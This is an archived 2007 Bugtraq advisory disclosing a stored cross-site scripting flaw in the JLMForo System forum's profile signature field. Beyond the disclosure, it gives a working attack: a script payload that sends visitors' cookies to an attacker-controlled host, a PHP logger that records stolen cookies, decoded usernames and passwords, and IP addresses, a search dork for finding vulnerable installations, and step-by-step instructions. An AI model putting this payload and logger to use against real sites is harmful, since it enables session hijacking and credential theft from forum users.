lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071126213821.12260.qmail@securityfocus.com>
Date: 26 Nov 2007 21:38:21 -0000
From: sys-project@...mail.com
To: bugtraq@...urityfocus.com
Subject: JLMForo System (modificarPerfil.php) Cross-Site Scripting
 Vulnerability

# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability
# Download:
# http://www.miscodigos.com/aplicaciones/JLMForo%20System/
# Bug found by Jose Luis Góngora Fernández / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Powered By JLMForo System"
# Stop lammer

# Explanation Basic :

1.- Register in the forum (registro.php)
2.- Put in your signature the XSS (modificarPerfil.php)
3.- Create a subject
4.- Wait to an answer to visualize the XSS

# To Rob Cookies:

1º- Register in the forum (registro.php)

2º- Put in your signature the XSS (modificarPerfil.php):

<script>window.location=’http://yousite.com/xss.php?cookie=’+document.cookie</script>

3º- Upload in your Site:

<?php
$archivo = fopen('log2.htm','a');//Aquí podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id']; 
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> 

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>

4º- Chmod 777 archive

5º- Create a subject

6º- Wait to an answer to run the XSS

 //---------------------------------------\\

Greetz To: All Hackers
Jose Luis Góngora Fernández / JosS!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ